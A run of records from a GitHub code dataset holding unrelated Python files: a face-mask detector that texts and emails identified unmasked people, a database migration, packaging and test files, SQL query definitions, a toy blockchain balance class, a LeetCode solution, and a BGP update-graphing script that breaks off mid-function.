maskNet):\n\t# grab the dimensions of the frame and then construct a blob\n\t# from it\n\t(h, w) = frame.shape[:2]\n\tblob = cv2.dnn.blobFromImage(frame, 1.0, (224, 224),\n\t\t(104.0, 177.0, 123.0))\n\n\t# pass the blob through the network and obtain the face detections\n\tfaceNet.setInput(blob)\n\tdetections = faceNet.forward()\n\tprint(detections.shape)\n\n\t# initialize our list of faces, their corresponding locations,\n\t# and the list of predictions from our face mask network\n\tfaces = []\n\tlocs = []\n\tpreds = []\n \n\t# loop over the detections\n\tfor i in range(0, detections.shape[2]):\n\t\tconfidence = detections[0, 0, i, 2]\n\t\tif confidence > 0.5:\n\t\t\tbox = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n\t\t\t(startX, startY, endX, endY) = box.astype(\"int\")\n\n\t\t\t(startX, startY) = (max(0, startX), max(0, startY))\n\t\t\t(endX, endY) = (min(w - 1, endX), min(h - 1, endY))\n\n\t\t\t\n\t\t\tface = frame[startY:endY, startX:endX]\n\t\t\tface = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n\t\t\tface = cv2.resize(face, (224, 
224))\n\t\t\tface = img_to_array(face)\n\t\t\t\n\t\t\tface = preprocess_input(face)\n\n\t\t\n\t\t\tfaces.append(face)\n\t\t\tlocs.append((startX, startY, endX, endY))\n\n\t# only make a prediction if at least one face was detected\n\tif len(faces) > 0:\n\t\t\n\t\tfaces = np.array(faces, dtype=\"float32\")\n\t\tpreds = maskNet.predict(faces, batch_size=32)\n\n\t# return a 2-tuple of the face locations and their corresponding\n\t# predictions\n\treturn (locs, preds)\n\n\n\n\n# load our serialized face detector model from disk\nprototxtPath = r\"face_detector\\deploy.prototxt\"\nweightsPath = r\"face_detector\\res10_300x300_ssd_iter_140000.caffemodel\"\nfaceNet = cv2.dnn.readNet(prototxtPath, weightsPath)\n\n# load the face mask detector model from disk\nmaskNet = load_model(\"mask_detector.model\")\n\n\n\n# initialize the video stream\nprint(\"[INFO] starting video stream...\")\nvs = VideoStream(src=0).start()\n\n# loop over the frames from the video stream\ncnt = 0 \n\n\ndef sendTheMessage(contactNumber, mail , name):\n\twith open('sheet.csv' , 'r+') as file: \n\t\tmyDataList = file.readlines()\n\t\tcontactList = []\n\t\t\n\n\t\tfor contact in myDataList:\n\t\t\tentry = contact.split(',')\n\t\t\tcontactList.append(entry[0])\n\n\t\tif contactNumber not in contactList:\n\t\t\ttime = datetime.now()\n\t\t\tdtString = time.strftime('%H:%M:%S')\n\n\t\t\tfile.writelines(f'\\n{contactNumber},{name},{mail},{dtString}')\n\n\t\t\tclient = Client(secretKey.ACCOUNT_SID , secretKey.AUTH_TOKEN)\n\t\t\ttextMsg = \"Dear \" + name +\",\\n\\n\"+ \"We have detected that you are not wearing a mask in a public place. Please wear your mask, otherwise you will be fined.\"\n\t\t\tif len(contactNumber)>11: \n\t\t\t\tmessage = client.messages.create(\n\t\t\t\t\tbody = textMsg,\n\t\t\t\t\tfrom_ = secretKey.TWILIO_NUMBER,\n\t\t\t\t\tto = contactNumber\n\t\t\t\t\t)\n\t\t\t\tprint(message.body)\n\t\t\telse:\n\t\t\t\tprint(contactNumber+\" is not verified by twilio\")\n\t\t\tSUBJECT = \"Warning regarding COVID-19\"\n\t\t\tmessage = 'Subject: {}\\n\\n{}'.format(SUBJECT, textMsg)\n\t\t\tserver.sendmail(secretKey.MY_MAIL_ADDRESS, mail , message)\n\n\n\n\nwhile True:\n\n\tframe = vs.read()\n\tframe = imutils.resize(frame, width=400)\n\timgS = cv2.cvtColor(frame , cv2.COLOR_BGR2RGB)\n\n\tfacesCurFrame = face_recognition.face_locations(imgS)\n\tencode = face_recognition.face_encodings(imgS , facesCurFrame)\n\n\n\tfor encodeFace , FaceLoc in zip(encode , facesCurFrame):\n\t\tmatches = face_recognition.compare_faces(encodeList , encodeFace)\n\t\tfaceDist = face_recognition.face_distance(encodeList , encodeFace)\n\t\t\n\t\tmatchIndex = np.argmin(faceDist)\n\t\tif matches[matchIndex] and contactNumber[matchIndex] and mailArr[matchIndex]:\n\t\t\tcontact = contactNumber[matchIndex]\n\t\t\tmail = mailArr[matchIndex]\n\t\t\tName = name[matchIndex]\n\t\t\tsendTheMessage(contact , mail, Name)\n\n\n\t(locs, preds) = detect_and_predict_mask(frame, faceNet, maskNet)\n\tfor (box, pred) in zip(locs, preds):\n\t\t(startX, startY, endX, endY) = box\n\t\t(mask, withoutMask) = pred\n\n\t\tlabel = \"Mask\" if mask > withoutMask else \"No Mask\"\n\t\tcolor = (0, 255, 0) if label == \"Mask\" else (0, 0, 255)\n\n\t\tlabel = \"{}: {:.2f}%\".format(label, max(mask, withoutMask) * 100)\n\n\t\tcv2.putText(frame, label, (startX, startY - 10),\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)\n\t\tcv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)\n\n\tcv2.imshow(\"Frame\", frame)\n\tkey = cv2.waitKey(1) & 0xFF\n\n\t# if the `q` key was pressed, break 
from the loop\n\tif key == ord(\"q\"):\n\t\tbreak\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()","repo_name":"I-E-T-Lucknow/B.Tech-CS----2022","sub_path":"05_Grp_DetectPeopleNotFollowingCovidNorms/code/detect_mask_video.py","file_name":"detect_mask_video.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"34"} +{"seq_id":"36042834532","text":"\"\"\"create downloadables table\n\nRevision ID: 583c79074d1f\nRevises: 817f06a069ae\nCreate Date: 2022-04-04 18:18:03.735338\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '583c79074d1f'\ndown_revision = '817f06a069ae'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'tbl_downloadfiles',\n sa.Column('id',sa.Integer,primary_key=True),\n sa.Column('parameter',sa.String(255)),\n sa.Column('filename_on_blob',sa.String(255))\n )\n\n\ndef downgrade():\n op.drop_table('tbl_downloadfiles')\n","repo_name":"mmsmdali/dicra","sub_path":"src/api/alembic/versions/583c79074d1f_create_downloadables_table.py","file_name":"583c79074d1f_create_downloadables_table.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"13115214110","text":"import re\n\nfrom setuptools import setup\n\n\nwith open(\"mypy2junit.py\", \"rt\", encoding=\"utf8\") as f:\n version = re.search(r'__version__ = \\'(.*?)\\'', f.read()).group(1)\n\nwith open(\"README.md\", \"rt\", encoding=\"utf8\") as f:\n readme = f.read()\n\nsetup(\n name=\"mypy2junit\",\n version=version,\n url=\"https://github.com/Dundee/mypy2junit\",\n license=\"BSD-3-Clause\",\n author=\"Daniel Milde\",\n author_email=\"daniel@milde.cz\",\n description=\"Script for converting output from MyPy to Junit XML format\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n classifiers=[\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n ],\n #packages=find_packages(\"mypy2junit\"),\n py_modules=[\"mypy2junit\"],\n python_requires=\">=3.5\",\n entry_points={\"console_scripts\": [\"mypy2junit = mypy2junit:main\"]},\n extras_require={\n \"dev\": [\n \"pytest\",\n ],\n },\n)\n","repo_name":"dundee/mypy2junit","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"3897154386","text":"\"\"\"\nTests for taqtoe.model.graph\n\"\"\"\n# Prevents TensorFlow logs from polluting Nose tests\n# (without setting an environment variable)\nimport logging\nlogging.getLogger(\"tensorflow\").setLevel(logging.WARNING)\n\nfrom unittest import TestCase\n\nimport tensorflow as tf\nfrom nose.tools import assert_raises, assert_equal, assert_not_equal\n\nfrom taqtoe.model.config import default_config\nfrom taqtoe.model.graph import TicTacToeDQNGraph\n\n\nclass TestTicTacToeDQNGraphTrain(TestCase):\n def setUp(self):\n self.dqn_graph = TicTacToeDQNGraph(default_config)\n\n def test_target_online_variables(self):\n online_vars = self.dqn_graph.get_online_variables()\n target_vars = self.dqn_graph.get_target_variables()\n # Make sure they are the same length\n assert_equal(len(online_vars), len(target_vars))\n # Make sure that there is no overlap between online and target vars\n for var in online_vars:\n assert var not in target_vars\n\n def test_build_inputs(self):\n boards, 
processed_inputs = self.dqn_graph.build_inputs()\n # Check to make sure that types are correct\n assert_equal(boards.op.type, 'Placeholder')\n assert_equal(type(processed_inputs), tf.Tensor)\n # Check to make sure that the shapes of the inputs are correct\n assert_equal(boards.get_shape().as_list(), [None, 3, 3])\n assert_equal(processed_inputs.get_shape().as_list(), [None, 3, 3, 1])\n\n\nclass TestTicTacToeDQNGraphInfer(TestCase):\n def setUp(self):\n self.dqn_graph = TicTacToeDQNGraph(default_config)","repo_name":"samjabrahams/taqtoe","sub_path":"taqtoe/tests/model/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"39642885738","text":"TABLES = {}\nTABLES['datasource'] = \"\"\"\nCREATE TABLE IF NOT EXISTS datasource(\n id INT AUTO_INCREMENT PRIMARY KEY NOT NULL,\n extracted TINYINT(1) NOT NULL,\n category VARCHAR(100) NOT NULL,\n category_label VARCHAR(100) NOT NULL,\n label VARCHAR(200) NOT NULL,\n type VARCHAR(20) NOT NULL,\n n INT NOT NULL,\n size INT,\n download_size INT,\n url VARCHAR(400) NOT NULL,\n filename VARCHAR(100) NOT NULL,\n file_ext VARCHAR(10) NOT NULL,\n active TINYINT(1) NOT NULL,\n download_start DATETIME,\n download_end DATETIME,\n download_duration INT,\n updated DATETIME\n)\n\"\"\"\n\nTABLES['dataset'] = \"\"\"\nCREATE TABLE IF NOT EXISTS dataset(\n id INT AUTO_INCREMENT PRIMARY KEY NOT NULL,\n stage VARCHAR(10) NOT NULL,\n filename VARCHAR(100) NOT NULL,\n category VARCHAR(100) NOT NULL,\n type VARCHAR(100) NOT NULL,\n n INT NOT NULL,\n size INT,\n created DATETIME,\n updated DATETIME\n)\n\"\"\"\n\nSEQUEL = {}\nSEQUEL['datasource'] = {\n 'create_table':\n {\n 'name': 'create_table',\n 'description': 'Creates the datasource table',\n 'table': 'datasource',\n 'qtype': 'create_table',\n 'sql': TABLES['datasource'],\n },\n 'select_all':\n {\n 'name': 'select_all',\n 'description': 'Select all data from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT * from datasource\"\"\"\n },\n 'select_category':\n {\n 'name': 'select_category',\n 'description': 'Select all data from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT * from datasource WHERE category = %s\"\"\"\n },\n 'select_url':\n {\n 'name': 'select_url',\n 'description': 'Select url from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT url from datasource WHERE id = %s\"\"\"\n },\n 'select_active':\n {\n 'name': 'select_active',\n 'description': 'Select active from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT active from datasource WHERE id = %s\"\"\"\n },\n 'select_type':\n {\n 'name': 'select_type',\n 'description': 'Select all data from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT * from datasource WHERE type = %s\"\"\",\n },\n 'select_category_type':\n {\n 'name': 'select_category_type',\n 'description': 'Select all data from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT * from datasource WHERE category = %s AND type = %s\"\"\",\n },\n 'select_count':\n {\n 'name': 'select_count',\n 'description': 'Select the number of rows in the datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT COUNT(*) from datasource\"\"\",\n },\n 'select_size':\n {\n 'name': 'select_size',\n 'description': 'Select the size of 
a datasource',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT size from datasource WHERE id = %s\"\"\",\n },\n 'insert':\n {\n 'name': 'insert_datasource',\n 'description': 'Insert data into the datasource table.',\n 'table': 'datasource',\n 'qtype': 'insert',\n 'sql': \"\"\"INSERT INTO datasource (extracted, category, category_label, label, type, n, url, filename, file_ext, active) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\",\n },\n 'update':\n {\n 'size':\n {\n 'name': 'update_size',\n 'description': 'Update the size of a datasource.',\n 'table': 'datasource',\n 'qtype': 'update',\n 'sql': \"\"\"UPDATE datasource SET size = %s WHERE id = %s\"\"\",\n },\n 'download':\n {\n 'name': 'download_update',\n 'description': 'Update datasource download metadata.',\n 'table': 'datasource',\n 'qtype': 'update',\n 'sql': \"\"\"UPDATE datasource SET\n download_size = %s,\n download_start = %s,\n download_end = %s,\n download_duration = %s,\n updated = %s\n WHERE id = %s\"\"\"\n },\n 'active':\n {\n 'name': 'update_active',\n 'description': 'Update the datasource active variable.',\n 'table': 'datasource',\n 'qtype': 'update',\n 'sql': \"\"\"UPDATE datasource SET active = %s WHERE id = %s\"\"\"\n }\n },\n 'drop':\n {\n 'name': 'drop',\n 'description': 'Drop datasource table.',\n 'table': 'datasource',\n 'qtype': 'drop',\n 'sql': \"\"\"DROP TABLE IF EXISTS datasource\"\"\",\n },\n 'delete':\n {\n 'name': 'delete',\n 'description': 'Delete from datasource table.',\n 'table': 'datasource',\n 'qtype': 'delete',\n 'sql': \"\"\"DELETE FROM datasource WHERE id = %s\"\"\",\n },\n 'exists':\n {\n 'name': 'exists',\n 'description': 'Checks existence of row in datasource table based on id.',\n 'table': 'datasource',\n 'qtype': 'exists',\n 'sql': \"\"\"SELECT EXISTS(SELECT 1 FROM datasource WHERE id = %s)\"\"\",\n },\n 'exists_category':\n {\n 'name': 'exists',\n 'description': 'Checks existence of row in datasource table based on id.',\n 'table': 'datasource',\n 'qtype': 'exists',\n 'sql': \"\"\"SELECT EXISTS(SELECT 1 FROM datasource WHERE category = %s)\"\"\",\n },\n\n\n}\n","repo_name":"john-james-ai/nlr","sub_path":"nlr/database/sequel.py","file_name":"sequel.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40891694037","text":"import pickle\n\nimport utils.helper\nfrom utils.helper import *\nimport sqlite3\npoolPath = 'data/pool.dat'\nclass balance:\n\n def __init__(self, connection, auth):\n self.connection = connection\n self.authUser = auth\n\n def get_current_balance(self):\n cur = self.connection.cursor()\n return cur.execute('SELECT coins FROM users where id = ?', (self.authUser,)).fetchone()\n\n def update_balance(self):\n cur = self.connection.cursor()\n cur.execute('UPDATE users SET coins = coins + 50 where id = ?', (self.authUser,))\n self.connection.commit()\n\n def get_current_balance_from_user(self, username):\n cur = self.connection.cursor()\n result = cur.execute('SELECT coins FROM users where username = ?', (username,)).fetchone()\n if result is None:\n return False\n else:\n return result\n\n def get_current_username(self, userId):\n cur = self.connection.cursor()\n result = cur.execute('SELECT username FROM users WHERE id = ?', (userId,)).fetchone()\n if result is None:\n return None\n return result\n def get_current_balance_in_pool(self):\n allTx = []\n with open(poolPath, \"rb+\") as f:\n try:\n while True:\n allTx.append(pickle.load(f))\n except 
EOFError:\n pass\n\n new_balance = 0\n startingBalance = self.get_current_balance()[0]\n for x in allTx:\n if x.userId[0] == self.authUser:\n amount_from_transaction = x.outputs[0][1]\n new_balance += amount_from_transaction\n return new_balance + startingBalance\n\n\n def get_user_pubc_key_by_id(self,userId):\n cur = self.connection.cursor()\n result = cur.execute('SELECT public_key FROM users WHERE id = ?', (userId,)).fetchone()\n if result is None:\n return None\n return str.encode(result[0])\n\n def calculate_the_balance_using_pool_income(self):\n alltx = get_all_transaction_in_the_pool()\n currentLoggedInPbcKey = self.get_user_pubc_key_by_id(self.authUser)\n currentbalance = 0\n for x in alltx:\n amount = x.outputs[0][1]\n pubcKey = x.outputs[0][0]\n if currentLoggedInPbcKey.decode('utf-8') == pubcKey.decode('utf-8'):\n currentbalance += amount\n return currentbalance\n\n def calculate_the_balance_using_pool_outcome(self):\n alltx = get_all_transaction_in_the_pool()\n pubc_key = self.get_user_pubc_key_by_id(self.authUser)\n currentbalance = 0\n for x in alltx:\n pubkey_x = x.inputs[0][0]\n if pubc_key.decode('utf-8') == pubkey_x.decode('utf-8'):\n outcome = x.inputs[0][1]\n currentbalance += outcome\n return currentbalance\n\n def total_balance_pool(self):\n outcome = self.calculate_the_balance_using_pool_outcome()\n income = self.calculate_the_balance_using_pool_income()\n balance = 50\n if income != outcome:\n return balance - outcome\n return None\n\n def calculate_the_balance_using_chain_outcome(self):\n allTx = get_all_tx_in_the_chain()\n if allTx is None:\n return \"Chain is empty\"\n else:\n pubc_key = self.get_user_pubc_key_by_id(self.authUser)\n balanceChain = 0\n for x in allTx:\n pubc_keyX = x.inputs[0][0]\n if pubc_key.decode('UTF-8') == pubc_keyX.decode('utf-8'):\n uitgave = x.inputs[0][1]\n balanceChain += uitgave\n return balanceChain\n\n def calculate_the_balance_using_chain_income(self):\n alltx = get_all_tx_in_the_chain()\n if alltx is None:\n return \"Chain is empty\"\n else:\n pubc_key = self.get_user_pubc_key_by_id(self.authUser)\n balanceChain = 0\n for x in alltx:\n amount = x.outputs[0][1]\n pubcKey = x.outputs[0][0]\n if pubc_key.decode('utf-8') == pubcKey.decode('utf-8'):\n balanceChain += amount\n return balanceChain\n\n def total_balance_chain(self):\n income = self.calculate_the_balance_using_chain_income()\n outcome = self.calculate_the_balance_using_chain_outcome()\n balance = 50\n if income != outcome:\n return (balance - outcome) + income\n return None\n def current_balance(self):\n if self.total_balance_pool() is not None and self.total_balance_chain() is not None:\n return self.total_balance_pool() + self.total_balance_chain()\n elif self.total_balance_pool() is not None:\n return self.total_balance_pool()\n elif self.total_balance_chain() is not None:\n return self.total_balance_chain()\n return 50\n","repo_name":"Darrensiriram/goodchain","sub_path":"actions/check_balance.py","file_name":"check_balance.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7878919330","text":"from dsa import *\n\ndef hasPathSum(self, root: Optional[TreeNode], targetSum: int) -> bool:\n # if there is no root, then it's impossible to find the targetSum\n if root is None:\n return False\n\n # initialize the base result to False\n hasSum = False\n\n # we perform dfs until we reach a leaf node then we see if we matched the targetSum for each leaf node\n def 
dfs(u,s=0):\n\n nonlocal hasSum\n \n # we will stop traversing if we already found the targetSum\n if hasSum == True:\n return\n\n # if we are on a leaf node, check if we found the targetSum\n if u.right is None and u.left is None:\n if (s+u.val) == targetSum:\n hasSum = True\n return\n \n # traverse binary tree\n if u.right:\n dfs(u.right,s+u.val)\n if u.left:\n dfs(u.left,s+u.val)\n\n dfs(root)\n return hasSum\n\n\n","repo_name":"mmvergara/mmv-dsa","sub_path":"leetcode/explained/112.py","file_name":"112.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36762791596","text":"#!/usr/bin/python3\n\n# ## {R2D2919B742E} ##\n# ###########################################################################\n# What if magic existed?\n# What if a place existed where your every thought and dream come to life.\n# There is only one catch: it has to be written down.\n# Such a place exists, it is called programming.\n# - Scott Taylor Reph, RightThumb.com\n# ###########################################################################\n# ## {C3P0D40fAe8B} ##\n\n# import os\n# import sys\n# import simplejson as json\n# import shutil\n\nimport _rightThumb._base1 as _\nimport _rightThumb._vars as _v\nimport _rightThumb._string as _str\n\nimport sqlite3\n\n\nimport sys\nimport hashlib\n\nimport os\n\n\n_.switches.register('Database', '-db,-database','%i%/C_Drive.db')\n_.switches.register('MD5', '-md5')\n\n# _.switches.register('Input', '-i','appIn.py')\n# _.switches.register('Output', '-o','folder\\\\appOut.py')\n# _.switches.register('Move', '-move','completed_in-folder_name')\n\n_.appInfo= {\n\t'file': 'dirDBMD5.py',\n\t'description': 'Changes the world',\n\t'prerequisite': [],\n\t'examples': [],\n\t'columns': [],\n\t}\n\n_.appInfo['examples'].append('p dirDBMD5 -database defaultDir.db')\n_.appInfo['examples'].append('')\n_.appInfo['examples'].append('p dirDBMD5 -db %i%/C_Drive.db -c name')\n_.appInfo['examples'].append('')\n_.appInfo['examples'].append('p dirdbmd5 -db test_MD5.db')\n_.appInfo['examples'].append('')\n\n\n\n\n\n\n\n\n\n_.appInfo['columns'].append({'name': 'name', 'abbreviation': 'n'})\n_.appInfo['columns'].append({'name': 'path', 'abbreviation': 'p'})\n_.appInfo['columns'].append({'name': 'folder', 'abbreviation': 'f'})\n_.appInfo['columns'].append({'name': 'bytes', 'abbreviation': 'b'})\n\n_.appInfo['columns'].append({'name': 'date_modified_raw', 'abbreviation': 'dmr,mdr'})\n_.appInfo['columns'].append({'name': 'date_created_raw', 'abbreviation': 'dcr,cdr'})\n\n_.appInfo['columns'].append({'name': 'md5', 'abbreviation': 'md5'})\n\n# stat\n# typesort\n\ndef formatColumns(columns):\n\tresult = ''\n\tfor c in columns.split(','):\n\t\tfor col in _.appInfo['columns']:\n\t\t\tfor a in col['abbreviation'].split(','):\n\t\t\t\tif a == c:\n\t\t\t\t\tc = col['name']\n\t\tresult += c + ','\n\tresult = result[:-1]\n\treturn result\n\n_.switches.trigger('Column',formatColumns)\n\n\n\n_.switches.process()\n\n\n# timestamp \n# echo %now% > %tmpf2%\n# type %tmpf1% | p line -make \" md5.py ;'{};' >> ;'%tmpf2%;'\" | p execute\n# timestamp\n# echo %now% >> %tmpf2%\n# done\n\n\n\n\n# pipeData = ''\n\n# if not sys.stdin.isatty():\n# pipeData = sys.stdin.readlines()\n# try:\n# if pipeData[0][0].isalnum() == False:\n# pipeData[0] = pipeData[0][1:]\n# except Exception as e:\n# pass\n\n########################################################################################\ndef md5(fname):\n\thash_md5 = 
hashlib.md5()\n\twith open(fname, \"rb\") as f:\n\t\tfor chunk in iter(lambda: f.read(4096), b\"\"):\n\t\t\thash_md5.update(chunk)\n\treturn hash_md5.hexdigest()\n\n\ndef formatSize(size):\n\t# check for None before casting, otherwise int(None) would raise\n\tif size is None:\n\t\treturn ''\n\tsize = int(size)\n\tresult = ''\n\tif size < 1024:\n\t\tresult = str(size) + ' B'\n\telif size > 1024 and size < 1048576:\n\t\tnum = round(size / 1024, 2)\n\t\tresult = str(num) + ' KB'\n\telif size > 1048576 and size < 1073741824:\n\t\tnum = round(size / 1048576, 2)\n\t\tresult = str(num) + ' MB'\n\telif size > 1073741824 and size < 1099511627776:\n\t\tnum = round(size / 1073741824, 2)\n\t\tresult = str(num) + ' GB'\n\telse:\n\t\tnum = round(size / 1099511627776, 2)\n\t\tresult = str(num) + ' TB'\n\t# if size < 1:\n\t# result = ''\n\treturn result\n\n\ndef action():\n\tif _.switches.isActive('Database'):\n\t\tif len(_.switches.value('Database')) > 1:\n\t\t\tdatabaseFile = _.switches.value('Database')\n\t\telse:\n\t\t\tdatabaseFile = \"defaultDir.db\"\n\n\t\t# print(databaseFile)\n\t\tconn = sqlite3.connect(databaseFile)\n\t\tc = conn.cursor()\n\t\t# sql = \"SELECT bytes,path FROM files WHERE path like '%0%'\"\n\t\tsql = \"SELECT * FROM md5 ORDER BY bytes\"\n\t\t# sql = \"SELECT bytes,path FROM files WHERE bytes < 101 and bytes > 49 ORDER BY bytes\"\n\t\t# sql = \"SELECT bytes,path FROM files WHERE bytes < 10000000 and bytes > 200 ORDER BY bytes\"\n\t\t# sql = \"SELECT bytes,path FROM files WHERE bytes > 100000000\"\n\t\tc.execute(sql)\n\t\t# c.execute('SELECT * FROM {tn} WHERE {cn} = {st}'.\\\n\t\t# format(tn='files', cn='path', st='s'))\n\t\tall_rows = c.fetchall()\n\t\t# print('1):', all_rows)\n\t\tnames = action2()\n\t\t# print(len(all_rows))\n\t\trows = []\n\t\tfor f in all_rows:\n\t\t\t# print(f)\n\t\t\t# print(_.switches.value('Column'))\n\n\t\t\trow = {}\n\t\t\tfor i,n in enumerate(names):\n\t\t\t\trow[n] = f[i]\n\t\t\tif _.switches.isActive('Column'):\n\t\t\t\tline = ''\n\t\t\t\tcol = _.switches.value('Column')\n\t\t\t\tfor c in col.split(','):\n\t\t\t\t\tline += str(row[c]) + str('\\t')\n\t\t\t\tprint(line)\n\t\t\telse:\n\t\t\t\trows.append({'md5': row['md5'], 'bytes': formatSize(row['bytes']), 'name': row['name'], })\n\t\t\t\t# print(row['md5'],formatSize(row['bytes']),'\\t',row['name'])\n\n\t\tif not _.switches.isActive('Column'):\n\t\t\t_.tables.register('Auto',rows)\n\t\t\t_.tables.print('Auto','md5,bytes,name')\n\n\t\t\t# if _.switches.value('Column') == 'name' or _.switches.value('Column') == 'n':\n\t\t\t# print(f[1])\n\t\t\t# else:\n\t\t\t# print(formatSize(f[0]),'\\t',f[1])\n\n\ndef action2():\n\tif _.switches.isActive('Database'):\n\t\tif len(_.switches.value('Database')) > 1:\n\t\t\tdatabaseFile = _.switches.value('Database')\n\t\telse:\n\t\t\tdatabaseFile = \"defaultDir.db\"\n\tconnection = sqlite3.connect(databaseFile)\n\tconnection.row_factory = sqlite3.Row\n\tcursor = connection.execute('select * from md5')\n\trow = cursor.fetchone()\n\tnames = row.keys()\n\t# print(names)\n\n\t# for n in names:\n\t\t# print(n)\n\n\treturn names\n\n\ndef action3():\n\tif _.switches.isActive('Database'):\n\t\tif len(_.switches.value('Database')) > 1:\n\t\t\tdatabaseFile = _.switches.value('Database')\n\t\telse:\n\t\t\tdatabaseFile = \"defaultDir.db\"\n\t\tcon = sqlite3.connect(databaseFile)\n\t\twith open('dump.sql', 'w') as f:\n\t\t\tfor line in con.iterdump():\n\t\t\t\tf.write('%s\\n' % 
line)\n########################################################################################\nif __name__ == '__main__':\n\taction()\n\t# print(action2())\n\n\n\n\n\n","repo_name":"rightthumb/rightthumb-widgets-v0","sub_path":"widgets/python/dirDBMD5.py","file_name":"dirDBMD5.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"20048732195","text":"#! /usr/bin/env python3\n\nimport sys\nimport matplotlib.pyplot as plt\n\ndef help():\n print('USAGE: graph.py FILESET INTERVALS [DATA_LEN]')\n print('Plot graphs with the number of received UPDATEs, UPDATEs per peer and the announced/withdrawn prefixes per peer.')\n print('')\n print('FILESET Path to file containing the filenames of the set of pcaps which should be analyzed. Each of this files has to contain packets of 1 hour. They have to be listed in the dataset in correct timeorder.')\n print(' Use for example tshark to parse the pcap:')\n print(' $ tshark -r trafficdump.pcap -M 1 -T fields -e _ws.col.Time -e ip.src -e bgp.nlri_prefix -e bgp.withdrawn_prefix -E separator=\";\" bgp.type==2 > parsed.csv')\n print('INTERVALS Interval (in seconds) for which received UPDATE messages should be grouped together for plotting in the graph. Comma separated list to plot multiple intervals.')\n print('DATA_LEN Time in seconds every single file in the dataset represents. Default: 3600')\n\ndef avg(data):\n if len(data) == 0:\n return 0\n else:\n return sum(data) / len(data)\n\ndef calc(interval_length, dataset_len):\n cur_interval_start = 0\n cur_interval = 1\n cur_interval_data = {\n # \"neighbor\": {'msg': 0, 'announced': 0, 'withdrawn': 0},\n }\n\n plt_intervals = []\n plt_total_msg = []\n plt_avg_msg_per_peer = []\n plt_avg_announced_per_peer = []\n plt_avg_withdrawn_per_peer = []\n max_announced = 0\n max_withdrawn = 0\n\n peerset = set()\n\n datafile_num = 0\n with open(sys.argv[1], 'r') as fileset:\n files = []\n for loadfile in fileset:\n files.append(loadfile.rstrip(\"\\n\"))\n for loadfile in files:\n with open(loadfile, 'r') as datafile:\n for line in datafile:\n # TIME;SRC;ANNOUNCE_LIST;WITHDRAW_LIST\n data = line.rstrip(\"\\n\").split(';')\n try:\n time = float(data[0]) + datafile_num * dataset_len\n src = data[1]\n announced_pfx = [] if data[2] == '' else data[2].split(\",\")\n withdrawn_pfx = [] if data[3] == '' else data[3].split(\",\")\n except Exception as e:\n print('ABORT!')\n print('Was not able to parse this line:')\n print(line)\n print('')\n print(e)\n sys.exit(1)\n\n if time > cur_interval_start + interval_length:\n # packet is in new interval. 
calculate current interval…\n msg_count = 0\n avg_msg = []\n avg_announced = []\n avg_withdrawn = []\n for neigh in cur_interval_data:\n peerset.add(neigh)\n d = cur_interval_data[neigh]\n msg_count += d['msg']\n avg_msg.append(d['msg'])\n avg_announced.append(d['announced'])\n avg_withdrawn.append(d['withdrawn'])\n max_announced = max(max_announced, d['announced'])\n max_withdrawn = max(max_withdrawn, d['withdrawn'])\n\n plt_intervals.append(cur_interval)\n plt_total_msg.append(msg_count)\n plt_avg_msg_per_peer.append(avg(avg_msg))\n plt_avg_announced_per_peer.append(avg(avg_announced))\n plt_avg_withdrawn_per_peer.append(avg(avg_withdrawn))\n\n # …and start next interval\n print(f\"[file {datafile_num+1}/{len(files)}] parsed interval {cur_interval} (processed {cur_interval*interval_length} seconds)\", end=\"\\r\")\n cur_interval_start += interval_length\n cur_interval += 1\n cur_interval_data = {}\n\n # add data to interval\n if src not in cur_interval_data.keys():\n cur_interval_data[src] = {'msg': 0, 'announced': 0, 'withdrawn': 0}\n cur_interval_data[src]['msg'] += 1\n cur_interval_data[src]['announced'] += len(announced_pfx)\n cur_interval_data[src]['withdrawn'] += len(withdrawn_pfx)\n\n del line\n del data\n del time\n del src\n del announced_pfx\n del withdrawn_pfx\n datafile_num += 1\n print(\"\")\n print(\"creating graphs...\")\n\n # get data ranges for withdraw/announce/msg\n plt_times = [i*interval_length for i in plt_intervals]\n\n print(f\"number of peers: {len(peerset)}\")\n 